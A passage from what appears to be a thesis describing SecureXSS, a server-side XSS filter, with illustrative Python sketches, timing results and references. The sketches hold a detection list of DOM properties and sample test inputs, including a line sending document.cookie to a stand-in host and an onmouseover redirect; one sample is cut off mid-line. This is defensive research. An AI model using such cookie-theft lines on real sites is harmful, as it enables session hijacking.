If all the malicious scripts at all the locations stated above are stripped successfully, novice users are protected from malignant XSS.
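
Searching a script for the properties of Table 5.3 can be sketched as follows. This is an illustrative Python example, not the SecureXSS code: the helper names are hypothetical, and the normalization shown (decode HTML character references, remove whitespace, lowercase) is an assumption about what normalization involves.

```python
import html
import re

# Property names from Table 5.3, lowercased to match the normalized text.
RESTRICTED_DOM_PROPERTIES = (
    "document.cookie", "document.location", "location.href",
    "location.replace", "location.reload", "window.location",
    "window.top.location", "location.assign", "window.self.location",
    "document.reload", "window.history", "history.forward", "history.go",
    "history.back", "document.write", "document.writeln", "document.title",
    "window.status", "window.defaultstatus", "document.getelementbyid",
    "document.getelementsbyname", "document.getelementsbytagname",
    "document.anchors", "document.forms", "document.frames",
    "document.images", "document.links", "window.frames",
)


def normalize(script):
    """Assumed normalization: decode entities, drop whitespace, lowercase."""
    decoded = html.unescape(script)
    return re.sub(r"\s+", "", decoded).lower()


def find_restricted(script):
    """Return the restricted properties that occur in the normalized script."""
    text = normalize(script)
    return [prop for prop in RESTRICTED_DOM_PROPERTIES if prop in text]


print(find_restricted("alert('hello')"))
print(find_restricted("window.open('http://hackersite.com/?c=' + Document . Cookie)"))
```

Plain substring matching is deliberately simple and can over-match (for example an identifier that merely ends in `history.go`); a real filter would need a stricter notion of a property access.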

CHAPTER 6

IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

As explained in Chapter 4, the solution should not burden the lay user (a user without any technology background) with extra configuration or installation at the browser end. At the same time, the user should enjoy secure browsing with no loss of functionality. Given the challenges identified and the solution proposed in Chapter 5, our goal is to implement a server-side API that is fast, does not weigh down the web server, and places minimal burden on web developers and administrators.

This part of the thesis covers the procedure of the solution, its implementation details, its working, the results, and finally a comparison of our solution with other existing solutions (with respect to time, not with respect to functionality).

6.1 Procedure

The abstract view of the solution given in Chapter 5 may not be enough for the reader to understand it fully. For the benefit of the reader, the core of the solution is presented in this section.

Algorithm 6.1 (High-level algorithm explaining the procedure of SecureXSS)

Input: Input given by the user (can be plain text, HTML or script)

Output: XSS-free user input (filtered user message)

1. Generate the DOM for all the tags in the user-given input.

2. Parse for all occurrences of script attributes (the Type 2 attributes explained in Chapter 5).

3. For each occurrence found in step 2, normalize the value of the attribute and validate it.

4. Restrict the value of Type 1 attributes as defined in Table 5.2.

5. Find all occurrences of the script tag, remove the src attribute if set, and normalize and validate the inner text of the script tag.

6. Find all occurrences of the style attribute, and normalize and validate it.

7. Find all occurrences of the style tag, and normalize and validate its inner text.

8. Find all occurrences of the form tag, remove the action attribute if set, and strip the inner text of the form tag.

9. Remove the attributes that failed validation in step 3 through step 8.

10. Return the XSS-free output.
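
The steps above can be sketched end to end as follows. This is a simplified Python illustration under several stated assumptions, not the SecureXSS implementation: it uses the standard `html.parser` module instead of Simple HTML DOM Parser, treats every attribute whose name starts with `on` as a Type 2 attribute, checks only a handful of the restricted properties, and skips step 4 because Table 5.2 is not reproduced here. All class and function names are hypothetical.

```python
import html
import re
from html.parser import HTMLParser

# A few entries from the restricted DOM property table (assumed subset).
RESTRICTED = ("document.cookie", "document.location", "window.location",
              "location.href", "document.write", "history.go")
VOID_TAGS = {"br", "hr", "img", "input", "link", "meta"}


def is_malicious(script):
    """Normalize (decode entities, drop whitespace, lowercase), then validate."""
    text = re.sub(r"\s+", "", html.unescape(script)).lower()
    return any(prop in text for prop in RESTRICTED)


class SecureXssSketch(HTMLParser):
    def __init__(self):
        super().__init__()           # step 1: the parser visits every tag
        self.out = []
        self.in_form = False
        self.script_buffer = None    # inner text of the open script/style tag

    def handle_starttag(self, tag, attrs):
        if self.in_form:
            return                   # step 8: content inside a form is stripped
        kept = []
        for name, value in attrs:
            scripted = name.startswith("on") or name == "style"  # steps 2, 6
            if scripted and is_malicious(value or ""):
                continue             # steps 3 and 9: drop attributes that fail
            if (tag, name) in (("script", "src"), ("form", "action")):
                continue             # steps 5 and 8
            kept.append(name if value is None
                        else f'{name}="{html.escape(value)}"')
        self.out.append("<" + " ".join([tag] + kept) + ">")
        if tag == "form":
            self.in_form = True
        elif tag in ("script", "style"):
            self.script_buffer = []

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False
        elif self.in_form or tag in VOID_TAGS:
            return
        elif tag in ("script", "style") and self.script_buffer is not None:
            body = "".join(self.script_buffer)
            self.script_buffer = None
            if not is_malicious(body):   # steps 5 and 7: keep harmless script
                self.out.append(body)
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.in_form:
            return
        if self.script_buffer is not None:
            self.script_buffer.append(data)
        else:
            self.out.append(html.escape(data, quote=False))


def secure_xss(user_input):
    parser = SecureXssSketch()
    parser.feed(user_input)
    parser.close()
    return "".join(parser.out)       # step 10


print(secure_xss('<b onclick="alert(1)">bold</b>'))
print(secure_xss('<img src="a.png" onmouseover="window.location=\'http://hackersite.com\'">'))
```

Note that the harmless `onclick` handler survives while the handler that touches `window.location` is removed, which is the distinction between simple script and XSS that the procedure aims for.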

6.2 Implementation Details

With the procedure above in mind, this section presents the implementation details of the SecureXSS API. SecureXSS is a server-side XSS filtering API developed in PHP5. To generate the DOM for the user-given input, we use Simple HTML DOM Parser [HDP], an open source API written in PHP.

The current version of SecureXSS is a model API developed in PHP5 to ease the web developer’s job, which in turn results in secure browsing for users. This model was developed to prove the correctness of the solution. Interested web developers are free to port the solution to other server-side technologies (such as ASP or JSP).

As stated above, our implementation uses Simple HTML DOM Parser (since we felt it worked better than other DOM parsers) to parse the user input and generate its DOM. The current implementation of the API is tied to Simple HTML DOM Parser; users who wish to use their own or any other available DOM parser may have to rewrite the API for their usage. Once the DOM tree has been generated for all tags in the user-given input, Step 2 to Step 9 of the procedure above remain the same.

6.3 Working of SecureXSS

SecureXSS is a server-side XSS filtering API that takes potentially malicious user input, validates it, and returns the non-malicious part of that input. The usage of the SecureXSS API is illustrated in Figure 6.1. When a user sends a POST request to the web server, the server instantiates the API and forwards the user input to it. The API validates the input, strips all malicious content and returns the non-malicious content to the server, which then processes the operation the user requested.

Figure 6.1: Server-side XSS Filtering API

The steps shown in Figure 6.1 are explained below:

1. The client sends a POST request to the web server.

2. The web server sends the request to the SecureXSS API.

3. SecureXSS sends back the non-malicious user request.

4. The web server stores the user post in the database or otherwise processes the request.
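
The request flow above can be sketched in a few lines. This is only an illustration in Python: `handle_post`, `toy_filter` and the in-memory list standing in for the database are hypothetical names, and `toy_filter` is a placeholder for the real SecureXSS filtering logic.

```python
def toy_filter(user_input):
    """Placeholder for the filtering API: removes one restricted property."""
    return user_input.replace("document.cookie", "")


def handle_post(user_input, xss_filter, database):
    """Server-side handling of one POST request (steps 2 to 4)."""
    clean = xss_filter(user_input)   # steps 2 and 3: filter before any use
    database.append(clean)           # step 4: only filtered input is stored
    return clean


posts = []
handle_post("hello <b>world</b>", toy_filter, posts)
print(posts)
```

The point of the design is that the filter sits between the request and every later use of the input, so neither the database nor other users ever see the unfiltered message.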

The working of the solution is illustrated on the sample HTML shown below.

document.write("

6.4 Results

Security mechanisms cannot be comprehensively tested because it is impossible to prove a negative. In other words, there is no way of knowing whether the set of all publicly known attacks, which can be incorporated into test cases, is equal to the set of all possible attacks. A subset (200 vectors) of all publicly known XSS attacks gathered from recognized knowledge bases [RSN] [W3S] has been tested with 100% effectiveness (shown in Appendix II). Of the 200 vectors we collected, 100 are malicious and the other 100 are non-malicious (as explained in Chapter 4).

Running time was also a very important consideration, given the importance of availability and response time for enterprise applications. For the timing tests, we collected a set of 350 web pages from popular sites such as http://news.yahoo.com/, http://news.google.com/ and http://msdn.microsoft.com/. The results of our timing tests (overhead) are shown in Table 6.1.

Table 6.1: SecureXSS timing test (overhead) results

| Size of HTML (KB) | Average Execution Time (sec) |
|---|---|
| 10-30 | 0.095048352 |
| 31-60 | 0.182305614 |
| 61-90 | 0.234215016 |
| 91-120 | 0.269700872 |

The results above are plotted in Figure 6.2, with the size of the HTML on the X-axis and the execution time on the Y-axis. The measurements were taken on an Intel Core 2 Duo 3.0 GHz system with 2 GB RAM, running Windows XP Professional SP2 and the XAMPP web server.
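
A timing test of this kind can be sketched as follows. This Python harness is an assumption about how such averages could be collected, not the script used for the thesis: the function names are hypothetical, the size buckets are taken from Table 6.1, and rounding page sizes to whole kilobytes is a choice made for the example.

```python
import time
from collections import defaultdict

# Size ranges in KB, as used in the timing results table.
BUCKETS = ((10, 30), (31, 60), (61, 90), (91, 120))


def bucket_for(size_kb):
    """Return the (low, high) range containing size_kb, or None."""
    for low, high in BUCKETS:
        if low <= size_kb <= high:
            return (low, high)
    return None


def average_overhead(pages, filter_fn):
    """Average wall-clock time of filter_fn per size bucket, in seconds."""
    totals = defaultdict(lambda: [0.0, 0])     # bucket -> [total time, count]
    for page in pages:
        size_kb = round(len(page.encode("utf-8")) / 1024)
        bucket = bucket_for(size_kb)
        if bucket is None:
            continue                           # outside the measured ranges
        start = time.perf_counter()
        filter_fn(page)
        totals[bucket][0] += time.perf_counter() - start
        totals[bucket][1] += 1
    return {bucket: total / count for bucket, (total, count) in totals.items()}


# Usage with synthetic pages and a stand-in filter function.
pages = ["a" * (20 * 1024), "b" * (50 * 1024), "c" * (100 * 1024)]
for bucket, seconds in sorted(average_overhead(pages, str.upper).items()):
    print(bucket, f"{seconds:.9f}")
```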

Figure 6.2: SecureXSS overhead on the server

The results are also compared with another popular XSS filtering API, HTML Purifier; the comparison is shown in Appendix III. As HTML Purifier is itself compared with the other solutions in [HTP], we can say that SecureXSS performs well relative to the existing server-side XSS filtering APIs.

CHAPTER 7

CONCLUSIONS

The Internet has revolutionized different aspects of human life, such as the way people communicate and do business. But trust in these applications and the user experience are not fully satisfactory, owing to the plethora of security breaches that occur frequently in critical applications such as banking and that threaten the privacy of legitimate customers’ details. This project helps increase the security of web applications, thereby enhancing end customers’ trust in them and providing a better experience online.

This project addresses one of the most important issues faced by present-day web users, the Cross-site Scripting (XSS) attack. The main goal of the project was to build a server-side XSS filtering API that differentiates simple script from malevolent XSS, with execution time as an additional consideration. Along the way, we worked on differentiating simple script from XSS (as no existing server-side XSS API makes this distinction) and proposed an approach for doing so. We also developed an open source server-side XSS filtering model API called SecureXSS (pronounced “Secure Excess”), which differentiates simple script from malignant XSS.

Scope for Future Work

The model API works well in stripping out genuine XSS (including XSS worms and viruses), but it is restricted to PHP, the language in which it was developed. The same logic can be extended to other server-side scripting languages (such as ASP or JSP), so that all classes of web developers can use the solution.

REFERENCES

[OWA] OWASP Top 10, The Ten Most Critical Web Application Security vulnerabilities, http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf, Last Accessed: July 7, 2009.

[CER] CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests, February 2000.

[XSS] Cross-site Scripting (XSS), www.owasp.org/index.php/Cross_site_scripting, Last Accessed: July 7, 2009.

[USC] US-CERT. eBay contains a cross-site scripting vulnerability. http://www.kb.cert.org/vuls/id/808921, 2006.

[KLE] Amit Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, 2005.

[PEW] Pew Internet & American Life Project Report: Spam and Phishing. http://www.pewinternet.org, 2005.

[STA] Ed Stansel. Don’t Get Caught by Online Phishers Angling for Account information. Florida Times-Union, 1997.

[OLL] Gunter Ollmann. The Phishing Guide, Understanding & Preventing Phishing Attacks. NGSSoftware Insight Security Research, 2004.

[RRO] J.Martin, Justus Winter. RequestRodeo: Client Side Protection against Session Riding. In OWASPAppSec2006Europe, 2006.

[ROB] Robert Auger. The Cross-Site Request Forgery (CSRF/XSRF) FAQ. http://www.cgisecurity.com/csrf-faq.html. Apr, 2008.

[CSRF] Cross Site Request Forgery, An introduction to a common web application weakness. Jesse Burns 2007.

[JEG] Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D. Petkov, Anton Rager, Seth Fogie, XSS Attacks Cross-site Scripting Exploits and Defence, Syngress Publishing, Inc., ISBN-13: 978-1-59749-154-9.

[BBC] BBCode, http://en.wikipedia.org/wiki/BBCode, Last Accessed: July 7, 2009.

[WIT] Wikitext, http://en.wikipedia.org/wiki/Wikitext, Last Accessed: July 7, 2009.

[MAD] Markdown, http://daringfireball.net/projects/markdown/, Last Accessed: July 7, 2009.

[TEX] Textile, http://textism.com/tools/textile/, Last Accessed: July 7, 2009.

[STT] Strip_tags – Manual, http://php.net/manual/en/function.strip-tags.php, Last Accessed: July 8, 2009.

[PIF] PHP Input Filter, www.phpclasses.org/browse/package/2189.html#download, Last Accessed: July 8, 2009.

[HTS] HTML_Safe, http://pear.php.net/package/HTML_Safe/, Last Accessed: July 8, 2009.

[KSS] Kses, http://sourceforge.net/projects/kses/, Last Accessed: July 8, 2009.

[HTL] htmLawed, www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php, Last Accessed: July 8, 2009.

[SHC] Safe HTML Checker, http://simonwillison.net/2003/Feb/23/safeHtmlChecker/, Last Accessed: July 8, 2009.

[HTP] HTML Purifier, http://htmlpurifier.org/, Last Accessed: July 8, 2009.

[ANT] Dabirsiaghi, Arshan, Towards Automated Malicious Code Detection and Removal on the Web, Open Web Application Security Project, Aspect Security, Inc., 2007.

[GEL] Security issues in Kses - Geeklog, http://www.geeklog.net/article.php/kses, Last Accessed: July 16, 2009.

[HTM] htmLawed, http://drupal.org/project/htmLawed, Last Accessed: July 16, 2009.

[HDP] PHP Simple HTML DOM Parser, http://simplehtmldom.sourceforge.net/, Last Accessed: July 20, 2009.

[RSN] XSS (Cross-site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html, Last Accessed: July 24, 2009.

[W3S] W3Schools, http://www.w3schools.com, Last Accessed: July 24, 2009.

APPENDIX I

OWASP THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES

The Open Web Application Security Project (OWASP) (www.owasp.org) is a worldwide

free and open community focused on improving the security of application software. OWASP’s

mission is to make application security visible, so that people and organizations can make

informed decisions about true application security risks.

The primary aim of the OWASP Top 10 is to educate developers, designers, architects

and organizations about the consequences of the most common web application security

vulnerabilities. This is based on the MITRE Vulnerability trends (explained in

http://cwe.mitre.org/documents/vuln-trends/index.html), from which the top ten vulnerabilities

are distilled. The following are the ranks of the vulnerabilities:

Figure 1: MITRE data on Top 10 web application vulnerabilities for 2006

[OWA] discusses each vulnerability in detail, along with the measures to be taken to protect an application from it. However, it is assumed that the most common vulnerabilities, such as unvalidated input, buffer overflows, integer overflows and format string issues, denial of service and insecure configuration management, are already taken care of in web applications. The following table provides a brief discussion of the top 10 web application vulnerabilities listed in the OWASP Top 10 2007 [OWA].

Table 1: OWASP Top 10 Web Application Vulnerabilities

Vulnerability Description

A1 – Cross Site Scripting (XSS)

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

A2 – Injection Flaws

Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.

A3 – Malicious File Execution

Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile
